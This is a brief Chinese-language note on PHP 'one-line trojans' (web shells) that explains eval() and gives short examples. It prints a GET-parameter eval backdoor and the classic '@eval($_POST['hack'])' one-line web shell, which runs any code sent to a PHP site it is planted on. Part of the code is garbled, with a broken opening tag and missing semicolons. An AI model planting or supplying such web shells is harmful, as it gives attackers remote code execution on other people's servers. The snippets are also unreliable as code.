一句话木马
eval()的特性是第一个成功了, 后续的才能执行;
php
<?p
if(isset($_GET['c'])){
$c = $_GET['c']
eval($c)
}
?>php
eval('phpinfo();phpinfo();fdsfsdfds'.'asdasdsa();');//成功执行
eval('asdasdsa();phpinfo();fdsfsdfds'.'asdasdsa();');//执行失败php
<?php
@eval($_POST['hack']);
?>